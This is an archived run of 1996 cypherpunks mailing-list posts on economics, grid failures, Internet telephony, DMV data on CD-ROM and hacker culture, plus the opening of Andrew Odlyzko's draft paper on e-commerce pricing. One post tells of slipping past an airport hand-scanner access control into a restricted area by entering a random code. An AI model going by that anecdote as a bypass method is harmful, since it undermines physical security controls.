> in the Third World will of course be better off. But in the US, the
> amount of capital will be lowered.

????

> So the American workers will be able to get other jobs, but these
> jobs will pay less, because of the diminished amount of capital in
> the US.

This is truly one of the oddest economic theses I've seen in years.

It seems like an odd offshoot of mercantilism at the very best...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 12 Aug 1996 13:53:37 +0800
To: Dave Farber <cypherpunks@toad.com
Subject: Re: US Power Outages
Message-ID: <v02120d06ae344a4cc94e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:15 8/11/96, Dave Farber wrote:
>The avalanche behavior of power systems is still not
>well understood and techniques to prevent such failures are not obvious.
>Same can be said of telephone and computer networks at different levels.

Does somebody here have a pointer to literature on this topic? A system in
which small localized disturbances can amplify, propagate through the
system, leading to catastrophic failure is the worst of all possible
designs. I fail to understand why a system as important as the power grid
would display this type of behavior. Why is the grid negatively dampened?

TIA,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 12 Aug 1996 15:32:13 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: e$: I Never Meta-Certification...
Message-ID: <v02120d07ae344c123415@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:30 8/11/96, Robert Hettinga wrote:

>Anyway, it's clear we're moving from a world of insecure transactions on
>private secure networks to one of secure transactions on insecure public
>networks. CAs, SSL, and the whole enterprise of encrypting links between
>accounting databases seem to be halfway measures to me. They're a way to
>create, like our friend from MIT says, a temporary private secure network,
>so you can send properly authorized, but still unsecure, book-entry down it.
>For that "proper authorization", you need the biometric identity a CA
>provides, so you can hunt down and jail miscreants who change the wrong book
>entry. I've even made biometric-identity CA jokes about "X.BlaBla" and
>"Numbers of the Beast", and all that.

Beware of biometrics. They can give a false sense of security. Case in
point: the other day, I picked up my girlfriend at an international airport
that uses hand shape scanners to control access to restricted areas. I had
her put her hand into the scanner, entered a random four digit code -- and
the scanner displayed "Access granted"... We quickly walked away.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 12 Aug 1996 10:06:35 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <199608112336.TAA13447@jekyll.piermont.com>
Message-ID: <199608120002.UAA13510@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I realized that I'd simply dismissed Bart without explaining why his
contention is so silly.

"Perry E. Metzger" writes:
> Bart Croughs writes:
> > 	 But there is another axiom of economics which the
> > nationalist/socialist can use for his case against the free movement of
> > capital. This axiom states that the wages of workers depend on the
> > amount of capital invested. The more capital invested, the higher the
> > wages are.
> 
> This must be some new axiom of economics that I had not heard of.

I failed to note obvious counterexamples. Well known authors get giant
advances for books written with manual typewriters. Minimum wage
workers routinely operate expensive equipment. Workers doing the same
job in different places using identical equipment that cost identical
sums earn different salaries.

Clearly, wages are defined by supply and demand -- not by "capital
investment".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 12 Aug 1996 14:24:07 +0800
To: cypherpunks@toad.com
Subject: [off-topic] Black powder source/ I love Explosives stickers
Message-ID: <v02120d0cae3454371dc9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


By popular request, here is the address for the place that sells the "I
(picture of a heart) Explosives" bumper stickers as well as black powder in
20 pound economy packs. Black powder will be shipped via UPS. Coonie's is a
federally licensed explosives dealer, offering a wide variety of commercial
high explosives. However, such explosives will only be sold to
appropriately licensed individuals. They are very nice people, please don't
ask them stupid questions.

Coonie's Explosives & Black Powder
512 E. Lea
Hobbs, N.M. 88240
Voice: (505) 393-0166
Fax:   (505) 393-6060





-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 12 Aug 1996 14:45:06 +0800
To: cypherpunks@toad.com
Subject: Re: FCC_ups
Message-ID: <v02120d0fae34593549d3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:08 8/11/96, John Young wrote:
>   8-10-96. WaPo:
>
>   "Phone Service Via the Internet May Slash Rates."
>
>      Labs of Advanced Technology has developed a way for
>      people to make long-distance calls over the Internet
>      using only their telephones, at about half the price of
>      ordinary toll calls. Customers would merely call a
>      central number, then dial their long-distance numbers.
>      The call is carried on the Internet, then put back onto
>      the local phone system at its destination. The company
>      plans to charge 5 to 8 cents per minute for all domestic
>      U.S. calls, which represents a 50 to 75 percent discount
>      off most domestic long-distance rates.

I am glad to see some movement in this area. I designed a similar system
for a previous employer of mine. But the real choke point is the local
loop. As of this day, the local telos still have a de facto monopoly in the
local markets. The new competitors (the same old Phone Company) that we
will see in the near future seem to show no desire to deliver the really
interesting services that are now possible. They long distance carriers
about to enter the local markets plan to offer the same old stuff at a
(perhaps) somewhat lower price.

The company I used to work for has technology capable of delivering a 10
Mb/s Ethernet plus 100 ISDN B channels to your home, using the very same
wires already in your wall. Keep this in mind next time you hear what great
new services the local telcos are about to offer. Then demand better.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 12 Aug 1996 07:08:47 +0800
To: cypherpunks@toad.com
Subject: FCC_ups
Message-ID: <199608112108.VAA23815@pipe1.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-10-96. WaPo: 
 
   "Phone Service Via the Internet May Slash Rates." 
 
      Labs of Advanced Technology has developed a way for 
      people to make long-distance calls over the Internet 
      using only their telephones, at about half the price of 
      ordinary toll calls. Customers would merely call a 
      central number, then dial their long-distance numbers. 
      The call is carried on the Internet, then put back onto 
      the local phone system at its destination. The company 
      plans to charge 5 to 8 cents per minute for all domestic 
      U.S. calls, which represents a 50 to 75 percent discount 
      off most domestic long-distance rates. International 
      rates would depend on arrangements made with foreign 
      phone companies. "Twenty years from now, and probably 
      sooner, I don't see the giants of the telecommunications 
      industry existing anymore," said the company's 
      president. The giants hoot, "FCC, PACs, whack him." 
 
   "PCs and the Postal Service Challenge the Mailroom Reign of 
   Pitney Bowes" 
 
      New technology has made it possible for IBM, Bell 
      Atlantic and National Semiconductor to start prowling 
      around postage meters, which account for $20 billion a 
      year in postage. With a telephone line to the post 
      office and some fancy computer software, a "stamp" could 
      spin out of the printer at the same time the envelope is 
      being addressed. Computer-generated envelopes will not 
      only have addresses and stamps, but also a bar code that 
      can quickly be read by a computer to hasten delivery. 
      Distinctive stamps called indicia carry a specially 
      encrypted numerical code that Pitney Bowes believes the 
      Postal Service should adopt to prevent counterfeiting. 
 
   ----- 
 
   http://jya.com/fccups.txt  (22 kb) via: www.anonymizer.com 
 
   FCC_ups 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Checkered Daemon <cdaemon@goblin.punk.net>
Date: Mon, 12 Aug 1996 15:39:49 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: National Socio-Economic Security Need for Encryption  Technology
In-Reply-To: <ae33e6f0010210042d89@[205.199.118.202]>
Message-ID: <199608120414.VAA05766@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May writes (with tongue firmly in cheek):
> 
> At 10:31 PM 8/11/96, Bart  Croughs wrote:
> 
> >         But there is another axiom of economics which the
> >nationalist/socialist can use for his case against the free movement of
> >capital. This axiom states that the wages of workers depend on the amount
> >of capital invested. The more capital invested, the higher the wages are.
> >If American
> 
> I agree strongly. In my Econ 101 class, lo those many years ago, I was
> constantly reminded to "Remember the Croughs Axiom!"
> 
> It is why MacDonald's workers, who work at a company which has invested
> truly vast sums of money in the capital of its outlets, pays its workers so
> much more than do the legal firms, advertising firms, etc., which have
> invested almost nothing in the capital of their facilities.
> 
> This is why so many lawyers choose to move into hamburger flipping. In
> fact, the lawyer who won the "hot coffee" lawsuit is now a Milkshake
> Trainee at the East Outback, Wisconsin MacDonalds.
> 
> "Would you like fries with that?"

Of course, it might work in the Macro realm:

Large amounts of capital are suddenly invested in the previously underfunded
Internet.  Sudden demand for scarce TCP/IP specialists sends salaries
soaring, causing Federal Reserve to tighten credit in fear of inflation };->

Worked for me ...

-- 
The Checkered Daemon			       	  cdaemon@goblin.punk.net

Delirium:  There must be a word for it ... the thing that lets you know that
	   TIME is happening.  IS there a word?
Sandman:   CHANGE.
Delirium:  Oh.  I was AFRAID of that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 12 Aug 1996 11:57:25 +0800
To: John Young <jya@pipeline.com>
Subject: Re: FCC _ ups
In-Reply-To: <199608112108.VAA23815@pipe1.ny3.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960811212557.14911D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 11 Aug 1996, John Young wrote:
>       Distinctive stamps called indicia carry a specially 

Man I was excited till I read that line more carefully :-)

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Mon, 12 Aug 1996 16:08:14 +0800
To: Jeffery Foy <bg809@scn.org>
Subject: Re: DMV/Public record data on CDROM
In-Reply-To: <njmDyoQ0mkvD091yn@scn.org>
Message-ID: <Pine.GUL.3.95.960811214938.21843D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 11 Aug 1996, Jeffery Foy wrote:

> >There are several state's DMV data (or other public record data such as
> >Voter Registration) available on CD-ROM, with DOS search engines.
> >
> >I have the demos for some of these programs on
> >
> >    http://www.escape.com/~pstira/pi
> >
> >Oregon is not the only place you can obtain this type of information.
> 
> The question turns out not to be "can this be done". It seems to be more 
> like - now that it is done, can you have your information removed if you 
> wish?

Of course not. Don't be silly.

My question is, "Yes, this can be done, but would YOU do it?" But I guess
ethics aren't high on the list of cypherpunk topics. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMg64MJNcNyVVy0jxAQE3pQH/WPBXoXR93sdt6+QjB2tQgoE2nt3b/K5h
bSjYNDoZ9Q6p5FyWUOzq+bxNqpVGHw1qoJgtYvr8LqakNEQN1adnwg==
=U/3T
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Mon, 12 Aug 1996 16:19:25 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: US Power Outages
In-Reply-To: <v02120d06ae344a4cc94e@[192.0.2.1]>
Message-ID: <Pine.3.89.9608112235.A16390-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


>From what I read, this wasn't a "small localized disturbance".  
Apparently, a fire underneath one of the main towers on the CA-OR border 
was the cause of the problem.  Now that may not sound like too much, but 
the lines were carrying at least 3000Mw of electricity, enough "to power 
3-1/2 Seattles for a day" (quote from local newspaper).  My guess is that 
when there is a problem involving that much power with no place to go, 
the safety systems shut everything down to prevent damage.

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127


On Sun, 11 Aug 1996, Lucky Green wrote:

> At 18:15 8/11/96, Dave Farber wrote:
> >The avalanche behavior of power systems is still not
> >well understood and techniques to prevent such failures are not obvious.
> >Same can be said of telephone and computer networks at different levels.
> 
> Does somebody here have a pointer to literature on this topic? A system in
> which small localized disturbances can amplify, propagate through the
> system, leading to catastrophic failure is the worst of all possible
> designs. I fail to understand why a system as important as the power grid
> would display this type of behavior. Why is the grid negatively dampened?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Unix_Code <unix_code@geocities.com>
Date: Mon, 12 Aug 1996 15:56:40 +0800
To: cypherpunks@toad.com
Subject: Read; NOW
Message-ID: <2.2.32.19960812022931.006d7320@mail.geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


        Hi I'm Unix Code and have a few things to ask...(it may not go with
Cryptography but go ahead and read)

------------==------------------==-----------------==-------------------==------

[Bill Gates]
What is wrong with him? I don't see any thing bad about him, instead I see
the guy who helped the best computer system of all become the most used
around the world. PC's. If he weren't here then probobly we'd be using Macs
Instead, OR  that we may be using a PC, But it's Super Expensive. I don't
understand.. why people are so mad at him. Now... I may get tons of letters
saying that you're wrong, and that he sux. But think about it. (I may also
want to add..that the
most known drink in at least [hacking] is jolt Cola
(http://www.joltcola.com), and ya know what.... he drinks it too.


[AOL and others]
**NOTE: When I mention AOL..I mean all of the online services.
I know I know... this is probobly going to be the most stupidest thing in
the world...but I'm going to say it. Alot of people hate AOL because of the
money you have to pay.. or people hate Prodidgy, CompuServe, etc. But lets
put money aside.. (even though it's a big issue.) AOL is actually [with out
the money] a great service. It has a 3.0 web browser which supports frames.
It has great Libraries of software. Great Chat Rooms. Great Hackers. Great
People. And it is a great atmusphere. and great [places.] Its money that's
the problem.



[Hackers]
Either you are a hacker, general user, or cryptography person, or a curious
user who wants to know alot of stuff from the advanced minds reading this
mailinglist. so lets put it straight. A hacker is a person who can get arund
the software. I am a hacker. I rate classes of hackers from A to F.

A - Person who can get around the software, knows how to use it
destructively, has hacked more than 10 times, has no care for family, and
has a bad temper, never gets out of the house, and drinks jolt cola more
than 5 times a day.

B - Person who can get around the software, knows how to use it destructively,
has hacked more than 5 times, has a bad temper, rarely gets out, and drinks
jolt cola more than 5 times a day.

C - Person who can get around the software, knows how to use it destructively,
has hacked more than 3 times, has a bad temper, gets out twice a week,
drinks jolt cola more than 3 times a day, and has a family.

D - Person who can get around the software, knows how to use it destructively,
has hacked 1 time, has a farely bad temper, gets out for work, drinks jolt
cola more than 5 times a day, has an income, has a family.

E - Person who can get around the software, Person who can get around the
software, knows how to use it destructively, has hacked never hacked, has a
controled temper, gets out for work and family, drinks jolt cola more than 3
times a day, has an income,and has a family.

F - Person who can get around the software, has a controled temper, gets out
for work and family, drinks jolt cola , has an income, and has a family.

Z - Person who can get around the software, knows how to use it
destructively, has hacked never hacked anything big, has a bad temper, gets
out for family, drinks jolt cola more than 3 times a day, has no income, has
a family, goes to school, stays on the computer forever.

I am a Class Z Hacker. MayBe alot of people won't thinka hacker is Kevin
Mitnick, but instead... Bill Gates.


------------==------------------==-----------------==-------------------==------

Thanks,
----UC   
3-D by UC (Sux.. but I don't care!)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^  
^$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^UUUUUUUUUUUU$$$$UUUUUUUUUUUU$$$$$$$$$$$$$$$$$CCCCCCCCCC$$$$$$$$$$$$^ 
^$UUUUUUUUU$$$$$$$UUUUUUUU$$$$$$$$$$$$$$$$$$$CCCCCCCCCCCC$$$$$$$$$$$^ 
^$UUUUUUUUU$$$$$$$UUUUUUUU$$$$$$$$$$$$$$$$$$CCCCCC$$$$$CCCC$$$$$$$$$^   vi@
^$UUUUUUUUU$$$$$$$UUUUUUUU$$$$$$$$$$$$$$$$$$CCCCCC$$$$$$$$$$$$$$$$$$^  Em@il
^$UUUUUUUU$$$$$$$$UUUUUUU $$$$$$$$$$$$$$$$$$CCCCCC$$$$$$$$$$$$$$$$$$^
^$UUUUUUU$$$$$$$$UUUUUUU$$$  http://
$$$$$$$CCCCCC$$$$$$$$CCCCCCC$$^unix_code@   
^$UUUUU$$$$$$$$$UUUUUU$$ www.geocities.com   $CCCCCCCCCCCCCCCCC$$$$$^geocities
^$UUUUUU$$$$$$$$UUUUU$    /CapitolHill/2381/ $$$$cccccccccccccc$$$$$^.com
^$$$UUUUUU$$$$$$$UUUUU                        $$$$$$cccccccccc$$$$$$^   
^$$$UUUUUUUUUUUUUUUU$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^$$$$UUUUUUUUUUUUU$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^$$$$$UUUUUUUUUUU$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^$$$$$$$UUUUUUU$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Mon, 12 Aug 1996 07:43:38 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <01BB87DE.CFF8D020@groningen15.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:

The first axiom of economics is "Wants are unlimited."  I'm glad that
they're "shipping all those jobs overseas."  The more people we have working
the more goodies are produced.  If the labor of US workers is freed up, then
they can go about producing something else valuable that they didn't have
time to produce before because those "third worlders" weren't doing their
fair share back when they were trapped in feudalism or fabian socialism.
You can't get more stuff (wealth) unless everyone is out there working to
capacity (consistent with their desired work/leisure tradeoff).

I agree that 'shipping all those jobs overseas' will not cause the US workers to lose jobs. There is other work they can do.
	 But there is another axiom of economics which the nationalist/socialist can use for his case against the free movement of capital. This axiom states that the wages of workers depend on the amount of capital invested. The more capital invested, the higher the wages are. If American companies are moving capital to Third World countries because of the low wages in these countries, then the workers in the Third World will of course be better off. But in the US, the amount of capital will be lowered. So the American workers will be able to get other jobs, but these jobs will pay less, because of the diminished amount of capital in the US.
	Of course there are advantages also for the US (shareholders will get higher returns, trade will increase), but how can you proof that these advantages will offset the disadvantage of the lowered amount of capital in the US? 
	Anyone?

Bart Croughs
	
	












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Aug 1996 00:07:15 +0800
To: cypherpunks@toad.com
Subject: Article on Electronic Commerce with a few too many assumptions
Message-ID: <01I85ZCPI14G9JD53S@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I haven't had time to do more than skim over the following article,
but I can already see some problems with it. For instance, he mentions CD
places not allowing agent searching - but with increasing development of
anonymization and like technology, will they have any choice?
	-Allen

[Permit me to recommend that you read this very interesting draft paper
and send its author, Andrew Odlyzko, detailed comments.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Fri, 9 Aug 96 14:17 EDT
From: amo@research.att.com
Subject:  electronic commerce article

Enclosed is the draft of an invited paper for the WebNet '96 conference
to be held in San Fransisco, Oct. 16-19, 1996, URL 
   http://aace.virginia.edu/aace/conf/webnet.html.
Comments are invited.

Andrew Odlyzko





                  The bumpy road of electronic commerce

                            Andrew Odlyzko
                         AT&T Labs - Research
                         amo@research.att.com

                   Preliminary version, August 9, 1996


Abstract:  Electronic commerce is widely expected to promote
"friction-free" capitalism, with consumers sending software agents to
scour the Net for the best deals.  Many distribution chains will
indeed be simplified and costs substantially reduced.  However, we are
also likely to see the creation of artificial barriers in electronic
commerce, designed by sellers to extract more value from consumers.
Frequent flyer mileage plans and the bundling of software into suites
are just two examples of the marketing schemes that are likely to
proliferate.  It appears that there will be much less a la carte
selling of individual items than is commonly expected, and more
subscription plans.  Therefore many current development plans should
be redirected.  Electronic commerce is likely to be even more
exasperating to consumers than current airline pricing, and will be
even further removed from the common conception of a "just price."  As
a result, there are likely to be more attempts to introduce government
regulation into electronic commerce.


Footnote:  This paper incorporates material from an earlier article
on electronic publishing, [Odlyzko].



1.  Introduction

Electronic commerce (or ecommerce for short) is still small, at least
if we consider only online consumer transactions, such as ordering a
book from amazon.com over the Internet.  In a broader sense, ecommerce
is much larger, since financial, news, and legal information services
such as Bloomberg, Reuters, and Lexis have total revenues in the
billions of dollars.  In a still broader sense, electronic funds
transfers are already huge, with daily transactions in the trillions
of dollars.  All these types of transactions are expected to grow, and
to become part of a much larger and uniform system of electronic
transactions.

While we are rapidly moving towards the Information Age, food,
shelter, and clothing will remain our most important needs.  However,
their shares of the economy are decreasing, and the information
content of their goods is increasing.  This is an old trend.
Agriculture has moved from being the largest segment of the economy a
century and a half ago to a relatively minor industry, dwarfed by the
medical sector, for example.  Furthermore, the cost of the basic
ingredients in cereals and other foods is a small portion of the total
price.  As a further example of the decreasing value of raw materials
and factory labor, a single celebrity is often paid as much for
endorsing an athletic shoe model as all the workers in the undeveloped
countries who assemble those shoes.  We can expect a continuation of
this trend, with the work of the "symbolic analysts" (who, in Robert
Reich's terminology, include lawyers, software writers, and
advertising executives) making up increasing fractions of the economy.

The main concern of this essay is electronic trade in information
goods, such as news, novels, software, music, movies, as well as
legal, medical, and credit information.  How will these goods be
distributed, and how will their production be financed?  Esther Dyson
[Dyson] predicts that almost all intellectual content will be
available for free.  In her view, some content production will be
supported by outside advertisers (who already pay for most of the cost
of newspapers, for example, as well as all the costs of the commercial
TV networks).  Some content will likely be made available for free, as
a form of advertising for other services by the producers (as the
Grateful Dead do in encouraging people to tape their performances, in
the hope this will bring more people to their concerts).  While
Dyson's vision will come true for a large part of the material on the
Net, it seems unlikely that it will be universal.  Movie studios such
as Disney attract large paying audiences to theaters and purchasers to
their videotapes through the quality of their products, and are likely
to do so in the future.  While some novelists make more money from
selling movie rights to their plots to Hollywood than from royalties
on books, this is rare.  Each year, over a hundred times as many books
are published as there are movies produced, and the sales of books are
much higher than movie theater revenues.  Thus we can expect that
content producers will usually want to be paid directly for their
work, as that will be the only feasible route to earning a living.
Furthermore, Dyson herself [Dyson] emphasizes that much of the value
on the Net "will go to the middlemen and trusted intermediaries who
add value - everything from guarantees of authenticity to software
support, selection, filtering, interpretation, and analysis."  How
will these middlemen be paid?  It seems likely that often they will
wish to collect payment directly from consumers, just as the online
legal information service Westlaw collects fees from attorneys who use
it.  The basic data in Westlaw is court opinions, which are freely
avaialable.  What gives Westlaw its lock on the market is the control
of its citation system.

Many of Dyson's predictions are likely to come true.  In particular,
huge amounts of intellectual property will be available for free.
However, it seems likely that there will also be a flourishing
ecommerce sector, with individuals purchasing goods and services.  The
question is, how will ecommerce be conducted?

The usual expectation is that ecommerce will promote "friction-free
capitalism," (cf.  [Gates]), with distribution costs reduced.  It is
easy to see how this can happen, as the older communication systems
such as the post office, the telegraph, the telephone, and the fax
have all served to make the economy more efficient.  The Internet
creates many more possibilities.  Classified ads, for example, bring
in a large fraction of the revenues of the newspaper industry, but can
be replaced by a much cheaper and easier to use electronic system.
Other part of the common vision of ecommerce are more questionable,
however, and that is what the rest of this essay will discuss.  It is
often thought that instead of buying an entire newspaper, readers will
pay for those individual stories they are interested in.  Someone
wishing to purchase a VCR might send an "intelligent agent" into the
Internet to collect bids from suppliers for a unit that meets desired
specifications, and then select the best choice.  While such scenarios
will be feasible technically, it is extremely unlikely they will be
dominant.  Instead, we are likely to see a proliferation of policies
such as those of current music CD retailers who sell on the Internet.
Most of them do not allow software agents to collect their prices.  We
are also likely to see a strenthening of the trend towards
subscription services and bundling of products, as is done in software
suites today.  This will often require redirection of development
efforts.

This essay is devoted largely to an explanation of the economic
reasons that are likely to lead to the creation of "bumps" on the
electronic superhighway.  These reasons operate already in the current
economy, and are responsible, for example, for the U.S. airline
pricing system, which is a source of frequent frustration and
complaints.  In ecommerce, frustration and complaints are likely to be
even more frequent.  The reasons for this are twofold.  On one hand,
the economic incentives to create artificial barriers will be greater
in ecommerce than today, since essentially all costs will be one time
costs of creating goods, and distribution will be practically free.
On the other hand, it will be much more transparent that the barriers
are artificial.  This will often collide with popular notions of what
is fair, and is likely to lead to attempts at much more intrusive
government regulations than we have seen so far.  In the past
governments have been involved primarily in security issues of the
Net, and more recently have gotten concerned about pornography.
However, in the future they are likely to attempt to regulate the
conduct of business on the Net as well.

If the predictions of this essay come true, then some of the current
development efforts will turn out to be misdirected.  In particular,
there is likely to be much less use of micropayments for individual
transactions, and more subscription services, which require different
systems.  Also, it will be necessary to prepare to comply with edicts
from various governments which will be changing and will often be
inconsistent.


2.  Natural and artificial barriers in commerce

Capitalism is excellent at inducing people to reduce barriers to
commercial activities.  However, it also produces incentives to create
artificial barriers.  Some of the barriers are created by government
action, such as those of patent and copyright laws, which give owners
of intellectual property a limited legal monopoly on the uses of their
creations.  Other barriers are created by merchants.  It is common for
an airline passenger to have paid 5 times as much as the person in an
adjacent seat, with the only difference between the two being that the
first one is not away from home on a Saturday night.  The airlines
would like to charge the business travelers (who are presumed to be
able and willing to pay) more than vacationers (who might drive a car
instead or not travel at all), but do not have a direct way to do so.
Therefore they impose the Saturday night stopover restrictions to
distinguish between those two classes of customers.  There have been
several attempts by airlines to move towards a simpler system of
uniform pricing (sometimes by newcomers, such as People Express,
sometimes by established carriers), but they all collapsed.  This
suggests that there is an underlying economic logic behind this
system, however exasperating it might be.  If that is so, though, we
can expect similar moves in ecommerce.

The general tendency in the marketplace is to avoid "commoditization,"
in which there are many almost equivalent products and services, and
where price is the only consideration.  Ford does not compete with
Honda in producing the most inexpensive Accord.  Instead, it offers
the Taurus as an alternative, and there are many features in which the
Accord and Taurus differ.  Sometimes commoditization is hard to
resist.  In some cases this happens because consumers learn there is
little to differentiate products.  As an example, oil companies have
pretty much given up on trying to convince people that gasoline
differs in anything other than octane ratings.  In other cases,
commoditization is forced on an industry by government edict or
effective private monopoly.  Intel and Microsoft have reduced the
IBM-compatible PC industry to a commodity business, in which they
collect almost all the profits, and the other players scramble to find
a niche that will enable them to do more than just break even.
However, those are the exceptions.  The general ecological principle
is towards evolution of species that fill different roles.  Zebras do
not attempt to compete with giraffes, but exploit a different part of
the ecosystem, and evolution does not lead to a convergence of those
two species.  Similarly, in the world of business, companies try to
differentiate their products.  Workstation producers could never in
the past agree on a common version of Unix, even under the threat of
being overwhelmed by PCs, since that would have required giving up the
distinctive features that bound them to their customers.  Even
airlines, which are basically in the commodity business of moving
people from one city to another, try to differentiate themselves
through frequent flier plans and special pricing schemes.

Ecommerce is likely to lead to a proliferation of pricing plans that
will seem to most people to be much more frustrating and less rational
than even today's U.S. airlines.  There will probably be a niche
market for people who care most about their convenience, and will use
their intelligent agents to do their shopping for them.  However, what
Sony, for example, might do is sell to that market only models of VCRs
that are not available elsewhere, and are hard to compare to those
sold in other places.  Stores that have physical buildings are likely
to serve a different clientele, and might also take further steps to
differentiate themselves to prevent comparison shopping, which will be
much easier with many people sharing their experiences on the
Internet.  There is likely to be a proliferation of frequent-shopper
plans.  Further, Sony VCRs sold in Sears stores might be slightly
different from those sold in WalMart, and model numbers and features
might change rapidly to inhibit consumer rating services (such as
Consumer Reports, or various Internet-based group-rating schemes that
are beginning to develop).  There are already artificial barriers to
free information flow.  Grocery stores routinely bar employees of
other stores from collecting extensive data on prices.  The policy of
Internet CD stores of preventing software agents from collecting
prices for comparison shopping is just an extension of such barriers
to free information flow to ecommerce.  We can expect more such
barriers.

While barriers to commerce of the type discussed above are usually
perceived as unfair (an issue that I will deal with more extensively
in the last section), they can increase not just the producers'
wealth, but economic efficiency and social welfare.  As a simple
example, consider an independent consultant who can produce a
technical report that two different customers might be willing to pay
$3,000, and $2,000 for, respectively.  If she has to charge a uniform
price to the two customers, the most she can get is $4,000, obtained
by pricing the report at $2,000.  However, if she charges the first
customer $3,000, and the other $2,000, she will earn $5,000.  If the
consultant's time and expenses to prepare the report are worth $4,500,
she will not undertake the effort if a uniform price is required.
>From an economic viewpoint it is therefore advantageous to allow her
to charge different prices to different customers.  However, the
customer that pays $3,000 is likely to resent it if somebody else
obtains the same product for $2,000, and often will not agree to the
deal if all conditions are publicly known.  This is caused by a
